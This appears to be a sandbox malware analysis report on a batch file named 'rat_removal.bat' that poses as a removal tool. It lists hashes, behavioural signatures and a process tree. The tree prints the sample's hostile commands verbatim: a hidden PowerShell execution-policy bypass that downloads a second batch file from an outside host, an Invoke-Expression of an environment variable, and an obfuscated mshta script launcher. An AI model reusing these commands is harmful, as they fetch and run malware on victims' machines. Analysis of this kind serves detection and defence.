Analysis
-
max time kernel
43s -
max time network
23s -
platform
windows11-21h2_x64 -
resource
win11-20240214-en -
resource tags
arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system -
submitted
14/03/2024, 05:24
Static task
static1
Behavioral task
behavioral1
Sample
rat_removal.bat
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
rat_removal.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
rat_removal.bat
Resource
win11-20240214-en
General
-
Target
rat_removal.bat
-
Size
14KB
-
MD5
2c0ee080298d0de1320e6e7eda4ca39b
-
SHA1
edd03f96d4f4277a24e541376fdddf43439b4a99
-
SHA256
7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e
-
SHA512
ffdfd43eb46107be849d3e1938d1db0be87d27700799a9f31527b512abaca615241c6ee2d6358061d5ea133233aa0edda9908091419c024977b25365064d9e64
-
SSDEEP
192:HbKSAmk7b/FQASmmZrQCgljChA4DW0JyquFnpUoH:H28k7b/hkQCgljwAEbyvFpL
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 1996 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2008 $sxr-mshta.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1996 powershell.exe 1996 powershell.exe 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3252 wrote to memory of 4420 3252 cmd.exe 80 PID 3252 wrote to memory of 4420 3252 cmd.exe 80 PID 3252 wrote to memory of 4160 3252 cmd.exe 81 PID 3252 wrote to memory of 4160 3252 cmd.exe 81 PID 3252 wrote to memory of 4472 3252 cmd.exe 82 PID 3252 wrote to memory of 4472 3252 cmd.exe 82 PID 3252 wrote to memory of 4124 3252 cmd.exe 83 PID 3252 wrote to memory of 4124 3252 cmd.exe 83 PID 3252 wrote to memory of 3556 3252 cmd.exe 84 PID 3252 wrote to memory of 3556 3252 cmd.exe 84 PID 3252 wrote to memory of 4652 3252 cmd.exe 85 PID 3252 wrote to memory of 4652 3252 cmd.exe 85 PID 3252 wrote to memory of 3260 3252 cmd.exe 86 PID 3252 wrote to memory of 3260 3252 cmd.exe 86 PID 3252 wrote to memory of 2996 3252 cmd.exe 87 PID 3252 wrote to memory of 2996 3252 cmd.exe 87 PID 3252 wrote to memory of 2608 3252 cmd.exe 88 PID 3252 wrote to memory of 2608 3252 cmd.exe 88 PID 3252 wrote to memory of 1996 3252 cmd.exe 89 PID 3252 wrote to memory of 1996 3252 cmd.exe 89 PID 3252 wrote to memory of 3028 3252 cmd.exe 92 PID 3252 wrote to memory of 3028 3252 cmd.exe 92 PID 3028 wrote to memory of 5016 3028 cmd.exe 93 PID 3028 wrote to memory of 5016 3028 cmd.exe 93 PID 3028 wrote to memory of 2444 3028 cmd.exe 94 PID 3028 wrote to memory of 2444 3028 cmd.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\chcp.comchcp.com 4372⤵PID:4420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:4160
-
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:4472
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:4124
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:3556
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:4652
-
-
C:\Windows\system32\find.exefind2⤵PID:3260
-
-
C:\Windows\system32\find.exefind2⤵PID:2996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:2608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "3⤵PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Executes dropped EXE
PID:2008 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%2⤵PID:432
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
15.5MB
MD57b10ed9636b737ceadbb064086ff94ca
SHA1de075e9898da93e3ebb17b86240716ef44df3574
SHA25619086f3bc2b071cf02d549551dae87f5baa0eee53305881d77b25a9be9e4e1ad
SHA5122bcd2d8f188498b577aedcb8e017e3a24ce61e1933090d20fbbfacca90bf5b3e4a2a9b213a479bd19a0aedf622f6ffa08f042b40bc73f66c8c1534966d5b9eeb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
Filesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd